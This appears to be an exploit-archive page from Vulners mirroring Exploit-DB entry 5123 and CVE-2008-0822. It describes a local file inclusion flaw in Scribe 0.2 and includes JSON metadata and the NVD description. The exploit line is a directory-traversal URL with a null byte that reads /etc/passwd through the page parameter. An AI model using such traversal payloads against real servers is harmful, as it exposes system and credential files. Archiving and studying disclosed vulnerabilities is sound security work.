Search...

Scribe <= 0.2 index.php page Local File Inclusion Vulnerability

2008-02-14T00:00:00

ID EDB-ID:5123
Type exploitdb
Reporter muuratsalo
Modified 2008-02-14T00:00:00

Description

Scribe <= 0.2 (index.php page) Local File Inclusion Vulnerability. CVE-2008-0822. Webapps exploit for php platform

                                        
                                            scribe 0.2 local file inclusion vulnerability

download   http://sourceforge.net/projects/scribe/
author     muuratsalo
contact    muuratsalo[at]gmail.com

exploit 
http://localhost/0.2/index.php?page=../../../../../../../../../../etc/passwd%00

# milw0rm.com [2008-02-14]

JSON Vulners Source

Initial Source

{"id": "EDB-ID:5123", "hash": "256f6a4a35c89b1df3abaa4bb65b3f95", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Scribe <= 0.2 index.php page Local File Inclusion Vulnerability", "description": "Scribe <= 0.2 (index.php page) Local File Inclusion Vulnerability. CVE-2008-0822. Webapps exploit for php platform", "published": "2008-02-14T00:00:00", "modified": "2008-02-14T00:00:00", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "href": "https://www.exploit-db.com/exploits/5123/", "reporter": "muuratsalo", "references": [], "cvelist": ["CVE-2008-0822"], "lastseen": "2016-01-31T22:38:01", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 5.9, "vector": "NONE", "modified": "2016-01-31T22:38:01"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-0822"]}], "modified": "2016-01-31T22:38:01"}, "vulnersScore": 5.9}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/5123/", "sourceData": "scribe 0.2 local file inclusion vulnerability\n\ndownload http://sourceforge.net/projects/scribe/\nauthor muuratsalo\ncontact muuratsalo[at]gmail.com\n\nexploit \nhttp://localhost/0.2/index.php?page=../../../../../../../../../../etc/passwd%00\n\n# milw0rm.com [2008-02-14]\n", "osvdbidlist": ["42225"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

{"cve": [{"lastseen": "2019-05-29T18:09:25", "bulletinFamily": "NVD", "description": "Directory traversal vulnerability in index.php in Scribe 0.2 allows remote attackers to read arbitrary local files via a .. (dot dot) in the page parameter.\nSecurity focus bid link notes that this is a local file include vulnerability.", "modified": "2018-10-15T22:03:00", "id": "CVE-2008-0822", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0822", "published": "2008-02-19T20:44:00", "title": "CVE-2008-0822", "type": "cve", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:N"}}]}

Scribe &lt;= 0.2 index.php page Local File Inclusion Vulnerability

Description

Scribe <= 0.2 (index.php page) Local File Inclusion Vulnerability. CVE-2008-0822. Webapps exploit for php platform

Scribe <= 0.2 index.php page Local File Inclusion Vulnerability